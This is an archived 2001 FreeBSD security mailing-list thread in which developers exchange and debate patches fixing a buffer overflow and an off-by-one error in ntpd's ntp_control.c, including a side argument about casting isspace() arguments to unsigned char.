freebsd-stable@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: su change? References: From: Dag-Erling Smorgrav Date: 05 Apr 2001 23:52:10 +0200 In-Reply-To: James Wyatt's message of "Thu, 5 Apr 2001 13:08:56 -0500 (CDT)" Message-ID: Lines: 14 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Wyatt writes: > On 5 Apr 2001, Dag-Erling Smorgrav wrote: > > James Wyatt writes: > > > Any experienced admin has plenty of tales (tightening access until telnet > > > fails > > I consider this (telnetd not working) a feature. > Not until you get sshd working! - Jy@ But your box isn't on the net until you get sshd working, so what's the problem? DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 15: 6:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from awww.jeah.net (awww.jeah.net [216.111.239.130]) by hub.freebsd.org (Postfix) with ESMTP id ABDAC37B446 for ; Thu, 5 Apr 2001 15:06:11 -0700 (PDT) (envelope-from chris@jeah.net) Received: from localhost (chris@localhost) by awww.jeah.net (8.11.3/8.11.0) with ESMTP id f35M6Ls90799 for ; Thu, 5 Apr 2001 17:06:22 -0500 (CDT) (envelope-from chris@jeah.net) Date: Thu, 5 Apr 2001 17:06:20 -0500 (CDT) From: Chris Byrnes To: Subject: ntpd patch Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I tried to apply the patch that was just sent to the list, and received: awww# patch -p < ntp.patch Hmm... Looks like a unified diff to me... The text leading up to this was: -------------------------- |Index: ntp_control.c |=================================================================== |RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v |retrieving revision 1.1.1.2.2.1 |diff -u -r1.1.1.2.2.1 ntp_control.c |--- ntp_control.c 2001/04/04 23:09:10 1.1.1.2.2.1 |+++ ntp_control.c 2001/04/05 05:35:37 -------------------------- Patching file ntp_control.c using Plan A... Hunk #1 failed at 1656. 1 out of 1 hunks failed--saving rejects to ntp_control.c.rej done awww# + Chris Byrnes, chris@JEAH.net + JEAH Communications + 1-866-AWW-JEAH (Toll-Free) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 16:14:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id 6DAAA37B506 for ; Thu, 5 Apr 2001 16:14:35 -0700 (PDT) (envelope-from marka@nominum.com) Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f35NE6T54121; Fri, 6 Apr 2001 09:14:08 +1000 (EST) (envelope-from marka@nominum.com) Message-Id: <200104052314.f35NE6T54121@drugs.dv.isc.org> To: Chris Byrnes Cc: security@freebsd.org From: Mark.Andrews@nominum.com Subject: Re: ntpd patch In-reply-to: Your message of "Thu, 05 Apr 2001 17:06:20 EST." Date: Fri, 06 Apr 2001 09:14:06 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org How did you save it? Cut-and-paste by any chance? Saved it on a Windows box then binary tranfered it to the FreeBSD box? Neither of these method are a good way of handling patches in email. The first tends to replace tabs with spaces, the second introduces carriage returns. Since for some reason I havn't actually seen my post come through there is no way I can see what various MTA have done to it on this list however I regularly send patches. Mark > I tried to apply the patch that was just sent to the list, and received: > > awww# patch -p < ntp.patch > Hmm... Looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ntp_control.c > |=================================================================== > |RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v > |retrieving revision 1.1.1.2.2.1 > |diff -u -r1.1.1.2.2.1 ntp_control.c > |--- ntp_control.c 2001/04/04 23:09:10 1.1.1.2.2.1 > |+++ ntp_control.c 2001/04/05 05:35:37 > -------------------------- > Patching file ntp_control.c using Plan A... > Hunk #1 failed at 1656. > 1 out of 1 hunks failed--saving rejects to ntp_control.c.rej > done > awww# > -- Mark Andrews, Nominum Inc. 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 16:28:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 34DBF37B505 for ; Thu, 5 Apr 2001 16:28:24 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.9.3) id f35NSN232886; Thu, 5 Apr 2001 16:28:23 -0700 (PDT) (envelope-from dillon) Date: Thu, 5 Apr 2001 16:28:23 -0700 (PDT) From: Matt Dillon Message-Id: <200104052328.f35NSN232886@earth.backplane.com> To: Mark.Andrews@nominum.com Cc: Chris Byrnes , security@FreeBSD.ORG Subject: Re: ntpd patch References: <200104052314.f35NE6T54121@drugs.dv.isc.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Poul's patch: http://apollo.backplane.com/FreeBSD/ntpd-patch1.diff Off-by-1 fix + buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff (second patch from Mark Andrews and others?) -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 16:55:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 77B4437B43F for ; Thu, 5 Apr 2001 16:55:22 -0700 (PDT) (envelope-from ache@nagual.pp.ru) Received: (from ache@localhost) by nagual.pp.ru (8.11.3/8.11.3) id f35Nt0806376; Fri, 6 Apr 2001 03:55:00 +0400 (MSD) (envelope-from ache) Date: Fri, 6 Apr 2001 03:54:59 +0400 From: "Andrey A. Chernov" To: Matt Dillon Cc: Mark.Andrews@nominum.com, Chris Byrnes , security@FreeBSD.ORG Subject: Re: ntpd patch Message-ID: <20010406035459.A6350@nagual.pp.ru> References: <200104052314.f35NE6T54121@drugs.dv.isc.org> <200104052328.f35NSN232886@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104052328.f35NSN232886@earth.backplane.com>; from dillon@earth.backplane.com on Thu, Apr 05, 2001 at 04:28:23PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 05, 2001 at 16:28:23 -0700, Matt Dillon wrote: > Off-by-1 fix + > buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff > For this one please change + while (tp != buf && isspace((int)(*(tp-1)))) to + while (tp != buf && isspace((unsigned char)(*(tp-1)))) (int) cast is completely wrong and dangerous. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 16:56:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id 042D637B496 for ; Thu, 5 Apr 2001 16:56:51 -0700 (PDT) (envelope-from marka@nominum.com) Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f35NuMT54272; Fri, 6 Apr 2001 09:56:23 +1000 (EST) (envelope-from marka@nominum.com) Message-Id: <200104052356.f35NuMT54272@drugs.dv.isc.org> To: Matt Dillon Cc: Chris Byrnes , security@FreeBSD.ORG From: Mark.Andrews@nominum.com Subject: Re: ntpd patch In-reply-to: Your message of "Thu, 05 Apr 2001 16:28:23 MST." <200104052328.f35NSN232886@earth.backplane.com> Date: Fri, 06 Apr 2001 09:56:22 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Poul's patch: http://apollo.backplane.com/FreeBSD/ntpd-patch1.diff > > Off-by-1 fix + > buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff > > (second patch from Mark Andrews and others?) > > -Matt > I've reimplemented the Off-by-1 fix ">=" vs "- 1". Fixed isspace() calling. Index: ntp_control.c =================================================================== RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v retrieving revision 1.1.1.2.2.1 diff -u -r1.1.1.2.2.1 ntp_control.c --- ntp_control.c 2001/04/04 23:09:10 1.1.1.2.2.1 +++ ntp_control.c 2001/04/05 23:53:13 @@ -1615,7 +1615,8 @@ /* * Delete leading commas and white space */ - while (reqpt < reqend && (*reqpt == ',' || isspace((int)*reqpt))) { + while (reqpt < reqend && (*reqpt == ',' || + isspace((unsigned char)*reqpt))) { reqpt++; } @@ -1639,7 +1640,8 @@ tp++; } if ((*tp == '\0') || (*tp == '=')) { - while (cp < reqend && isspace((int)*cp)) + while (cp < reqend && + isspace((unsigned char)*cp)) cp++; if (cp == reqend || *cp == ',') { buf[0] = '\0'; @@ -1652,26 +1654,19 @@ if (*cp == '=') { cp++; tp = buf; - while (cp < reqend && isspace((int)*cp)) + while (cp < reqend && + isspace((unsigned char)*cp)) cp++; while (cp < reqend && *cp != ',') { *tp++ = *cp++; - if (tp > buf + sizeof(buf)) { - msyslog(LOG_WARNING, "Attempted \"ntpdx\" exploit from IP %d.%d.%d.%d:%d (possibly spoofed)\n", - (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff, - ntohs(rmt_addr->sin_port) -); - + if (tp >= buf + sizeof(buf)) return (0); - } } if (cp < reqend) cp++; *tp = '\0'; - while (isspace((int)(*(tp-1)))) + while (tp != buf && + isspace((unsigned char)(*(tp-1)))) *(--tp) = '\0'; reqpt = cp; *data = buf; -- Mark Andrews, Nominum Inc. 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 16:59:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from awww.jeah.net (awww.jeah.net [216.111.239.130]) by hub.freebsd.org (Postfix) with ESMTP id 88DEE37B440 for ; Thu, 5 Apr 2001 16:59:08 -0700 (PDT) (envelope-from chris@jeah.net) Received: from localhost (chris@localhost) by awww.jeah.net (8.11.3/8.11.0) with ESMTP id f35NxED02777; Thu, 5 Apr 2001 18:59:15 -0500 (CDT) (envelope-from chris@jeah.net) Date: Thu, 5 Apr 2001 18:59:12 -0500 (CDT) From: Chris Byrnes To: Cc: Matt Dillon , Subject: Re: ntpd patch In-Reply-To: <200104052356.f35NuMT54272@drugs.dv.isc.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can you put it on the web somewhere, or attach it to an email, as everytime I get a patch from the list it fails when I try to patch? + Chris Byrnes, chris@JEAH.net + JEAH Communications + 1-866-AWW-JEAH (Toll-Free) On Fri, 6 Apr 2001 Mark.Andrews@nominum.com wrote: > > > Poul's patch: http://apollo.backplane.com/FreeBSD/ntpd-patch1.diff > > > > Off-by-1 fix + > > buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff > > > > (second patch from Mark Andrews and others?) > > > > -Matt > > > > I've reimplemented the Off-by-1 fix ">=" vs "- 1". > Fixed isspace() calling. > > Index: ntp_control.c > =================================================================== > RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v > retrieving revision 1.1.1.2.2.1 > diff -u -r1.1.1.2.2.1 ntp_control.c > --- ntp_control.c 2001/04/04 23:09:10 1.1.1.2.2.1 > +++ ntp_control.c 2001/04/05 23:53:13 > @@ -1615,7 +1615,8 @@ > /* > * Delete leading commas and white space > */ > - while (reqpt < reqend && (*reqpt == ',' || isspace((int)*reqpt))) { > + while (reqpt < reqend && (*reqpt == ',' || > + isspace((unsigned char)*reqpt))) { > reqpt++; > } > > @@ -1639,7 +1640,8 @@ > tp++; > } > if ((*tp == '\0') || (*tp == '=')) { > - while (cp < reqend && isspace((int)*cp)) > + while (cp < reqend && > + isspace((unsigned char)*cp)) > cp++; > if (cp == reqend || *cp == ',') { > buf[0] = '\0'; > @@ -1652,26 +1654,19 @@ > if (*cp == '=') { > cp++; > tp = buf; > - while (cp < reqend && isspace((int)*cp)) > + while (cp < reqend && > + isspace((unsigned char)*cp)) > cp++; > while (cp < reqend && *cp != ',') { > *tp++ = *cp++; > - if (tp > buf + sizeof(buf)) { > - msyslog(LOG_WARNING, "Attempted \"ntpdx\" exploit from IP %d.%d.%d.%d:%d (possibly spoofed)\n", > - (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff, > - (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff, > - (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff, > - (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff, > - ntohs(rmt_addr->sin_port) > -); > - > + if (tp >= buf + sizeof(buf)) > return (0); > - } > } > if (cp < reqend) > cp++; > *tp = '\0'; > - while (isspace((int)(*(tp-1)))) > + while (tp != buf && > + isspace((unsigned char)(*(tp-1)))) > *(--tp) = '\0'; > reqpt = cp; > *data = buf; > -- > Mark Andrews, Nominum Inc. > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17: 9:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id A673E37B423 for ; Thu, 5 Apr 2001 17:09:52 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.9.3) id f3609lW34732; Thu, 5 Apr 2001 17:09:47 -0700 (PDT) (envelope-from dillon) Date: Thu, 5 Apr 2001 17:09:47 -0700 (PDT) From: Matt Dillon Message-Id: <200104060009.f3609lW34732@earth.backplane.com> To: Mark.Andrews@nominum.com Cc: Chris Byrnes , security@FreeBSD.ORG Subject: Re: ntpd patch References: <200104052356.f35NuMT54272@drugs.dv.isc.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : : :> Poul's patch: http://apollo.backplane.com/FreeBSD/ntpd-patch1.diff :> :> Off-by-1 fix + :> buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff :> :> (second patch from Mark Andrews and others?) :> :> -Matt :> : : I've reimplemented the Off-by-1 fix ">=" vs "- 1". : Fixed isspace() calling. I'll add the unsigned char stuff to the patches on my site. You can duke it out with Poul in regards to the buffer overload / syslog stuff. My new patch page is on: http://apollo.backplane.com/FreeBSD/ntpd.html -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17:33:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (awfulhak.demon.co.uk [194.222.196.252]) by hub.freebsd.org (Postfix) with ESMTP id F3C3D37B422 for ; Thu, 5 Apr 2001 17:33:53 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.3/8.11.3) with ESMTP id f360XkU13167; Fri, 6 Apr 2001 01:33:46 +0100 (BST) (envelope-from brian@lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.3/8.11.3) with ESMTP id f360XfP03505; Fri, 6 Apr 2001 01:33:41 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200104060033.f360XfP03505@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: "Andrey A. Chernov" Cc: Matt Dillon , Mark.Andrews@nominum.com, Chris Byrnes , security@FreeBSD.ORG, brian@Awfulhak.org Subject: Re: ntpd patch In-Reply-To: Message from "Andrey A. Chernov" of "Fri, 06 Apr 2001 03:54:59 +0400." <20010406035459.A6350@nagual.pp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Apr 2001 01:33:41 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Thu, Apr 05, 2001 at 16:28:23 -0700, Matt Dillon wrote: > > Off-by-1 fix + > > buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff > > > > For this one please change > > + while (tp != buf && isspace((int)(*(tp-1)))) > > to > > + while (tp != buf && isspace((unsigned char)(*(tp-1)))) > > (int) cast is completely wrong and dangerous. $ man isspace ..... SYNOPSIS #include int isspace(int c) ..... I believe the int is correct. > -- > Andrey A. Chernov > http://ache.pp.ru/ -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17:38: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 347F337B507 for ; Thu, 5 Apr 2001 17:37:58 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id 98BAF13615; Thu, 5 Apr 2001 20:38:14 -0400 (EDT) Date: Thu, 5 Apr 2001 20:38:14 -0400 From: Chris Faulhaber To: Mark.Andrews@nominum.com Cc: Matt Dillon , security@FreeBSD.ORG Subject: Re: ntpd patch Message-ID: <20010405203814.B91568@peitho.fxp.org> References: <200104052328.f35NSN232886@earth.backplane.com> <200104052356.f35NuMT54272@drugs.dv.isc.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="kXdP64Ggrk/fb43R" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104052356.f35NuMT54272@drugs.dv.isc.org>; from Mark.Andrews@nominum.com on Fri, Apr 06, 2001 at 09:56:22AM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --kXdP64Ggrk/fb43R Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Apr 06, 2001 at 09:56:22AM +1000, Mark.Andrews@nominum.com wrote: >=20 > > Poul's patch: http://apollo.backplane.com/FreeBSD/ntpd-patch1.diff > >=20 > > Off-by-1 fix + > > buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff > >=20 > > (second patch from Mark Andrews and others?) > >=20 > > -Matt > >=20 >=20 > I've reimplemented the Off-by-1 fix ">=3D" vs "- 1". > Fixed isspace() calling. >=20 alternatively, fix the off-by-one and underflow in one line (obtained from NetBSD): Index: ntp_control.c =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v retrieving revision 1.2 diff -u -r1.2 ntp_control.c --- ntp_control.c 2001/04/04 23:07:22 1.2 +++ ntp_control.c 2001/04/05 21:42:48 @@ -1656,17 +1656,8 @@ cp++; while (cp < reqend && *cp !=3D ',') { *tp++ =3D *cp++; - if (tp > buf + sizeof(buf)) { - msyslog(LOG_WARNING, "Attempted \"ntpdx\" exploit from IP %d.%d.%d= .%d:%d (possibly spoofed)\n",=20 - (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff, - ntohs(rmt_addr->sin_port) -); - + if (tp >=3D buf + sizeof(buf) - 1) return (0); - } } if (cp < reqend) cp++; --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --kXdP64Ggrk/fb43R Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjrND/YACgkQObaG4P6BelDDGACgpDLBm0zwjg9afKKJITxNyCh1 GUMAn0Ic64pH9PxXIz2QSMae6BF/XlRm =kkDS -----END PGP SIGNATURE----- --kXdP64Ggrk/fb43R-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17:38:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id AA41137B496 for ; Thu, 5 Apr 2001 17:38:25 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id UAA73318; Thu, 5 Apr 2001 20:38:02 -0400 (EDT) (envelope-from wollman) Date: Thu, 5 Apr 2001 20:38:02 -0400 (EDT) From: Garrett Wollman Message-Id: <200104060038.UAA73318@khavrinen.lcs.mit.edu> To: Brian Somers Cc: security@FreeBSD.ORG Subject: Re: ntpd patch In-Reply-To: <200104060033.f360XfP03505@hak.lan.Awfulhak.org> References: <20010406035459.A6350@nagual.pp.ru> <200104060033.f360XfP03505@hak.lan.Awfulhak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I believe the int is correct. You are mistaken. The purpose of the cast is to defeat the automatic promotion from `char' to `int', which causes sign-extension if `char' is signed. Casting to `unsigned char' prevents this from happening. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17:49:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (awfulhak.demon.co.uk [194.222.196.252]) by hub.freebsd.org (Postfix) with ESMTP id 7685237B424 for ; Thu, 5 Apr 2001 17:49:29 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.3/8.11.3) with ESMTP id f360nZU13246; Fri, 6 Apr 2001 01:49:35 +0100 (BST) (envelope-from brian@lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.3/8.11.3) with ESMTP id f360nVP03735; Fri, 6 Apr 2001 01:49:31 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200104060049.f360nVP03735@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: Garrett Wollman Cc: Brian Somers , security@FreeBSD.ORG, brian@Awfulhak.org Subject: Re: ntpd patch In-Reply-To: Message from Garrett Wollman of "Thu, 05 Apr 2001 20:38:02 EDT." <200104060038.UAA73318@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Apr 2001 01:49:31 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > < said: > > > I believe the int is correct. > > You are mistaken. The purpose of the cast is to defeat the automatic > promotion from `char' to `int', which causes sign-extension if `char' > is signed. Casting to `unsigned char' prevents this from happening. Oops, yes... I guess I'll go to bed now then :*I > -GAWollman -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17:55: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 788D937B43E for ; Thu, 5 Apr 2001 17:55:05 -0700 (PDT) (envelope-from ache@nagual.pp.ru) Received: (from ache@localhost) by nagual.pp.ru (8.11.3/8.11.3) id f360sHv07065; Fri, 6 Apr 2001 04:54:17 +0400 (MSD) (envelope-from ache) Date: Fri, 6 Apr 2001 04:54:16 +0400 From: "Andrey A. Chernov" To: Brian Somers Cc: Matt Dillon , Mark.Andrews@nominum.com, Chris Byrnes , security@FreeBSD.ORG Subject: Re: ntpd patch Message-ID: <20010406045416.B6984@nagual.pp.ru> References: <200104060033.f360XfP03505@hak.lan.Awfulhak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104060033.f360XfP03505@hak.lan.Awfulhak.org>; from brian@Awfulhak.org on Fri, Apr 06, 2001 at 01:33:41AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Apr 06, 2001 at 01:33:41 +0100, Brian Somers wrote: > $ man isspace > ..... > SYNOPSIS > #include > > int > isspace(int c) > ..... > > I believe the int is correct. No! Please read _whole_ manpage, not just prototype. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17:56:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 69BF237B424 for ; Thu, 5 Apr 2001 17:56:47 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.9.3) id f360uCN35967; Thu, 5 Apr 2001 17:56:12 -0700 (PDT) (envelope-from dillon) Date: Thu, 5 Apr 2001 17:56:12 -0700 (PDT) From: Matt Dillon Message-Id: <200104060056.f360uCN35967@earth.backplane.com> To: Brian Somers Cc: "Andrey A. Chernov" , Mark.Andrews@nominum.com, Chris Byrnes , security@FreeBSD.ORG, brian@Awfulhak.org Subject: Re: ntpd patch References: <200104060033.f360XfP03505@hak.lan.Awfulhak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The issue here is that 'tp' is a 'char' type, which may be signed by default (e.g. on IA32 it is signed). If you pass a signed char to a ctype macro/function taking an int, any character >= 0x80 will be turned into a negative number when it is expanded to an integer. The cast to unsigned char simply ensures that when the character is expanded to an integer in the procedure call, it is not converted into a negative number. Now, I don't think FreeBSD cares about this at all. However, many older systems do care and it is just plain common sense to not pass a negative number to a ctype macro when you don't need to. The last time I had to port a piece of software to a Solaris box (I don't remember what version it was running), with -Wall -Wstrict-prototypes, the solaris box complained mightily about passing a char to a ctype macro. This is just common sense, really. How generic do we want the code to be? It certainly doesn't hurt. -Matt :> :> + while (tp != buf && isspace((unsigned char)(*(tp-1)))) :> :> (int) cast is completely wrong and dangerous. : :$ man isspace :..... :SYNOPSIS : #include : : int : isspace(int c) :..... : :I believe the int is correct. : :> -- :> Andrey A. Chernov :> http://ache.pp.ru/ : :-- :Brian : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 18: 3:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id BDE9D37B424 for ; Thu, 5 Apr 2001 18:03:25 -0700 (PDT) (envelope-from ache@nagual.pp.ru) Received: (from ache@localhost) by nagual.pp.ru (8.11.3/8.11.3) id f36133807225; Fri, 6 Apr 2001 05:03:04 +0400 (MSD) (envelope-from ache) Date: Fri, 6 Apr 2001 05:03:02 +0400 From: "Andrey A. Chernov" To: Matt Dillon Cc: Brian Somers , Mark.Andrews@nominum.com, Chris Byrnes , security@FreeBSD.ORG Subject: Re: ntpd patch Message-ID: <20010406050302.C6984@nagual.pp.ru> References: <200104060033.f360XfP03505@hak.lan.Awfulhak.org> <200104060056.f360uCN35967@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104060056.f360uCN35967@earth.backplane.com>; from dillon@earth.backplane.com on Thu, Apr 05, 2001 at 05:56:12PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk 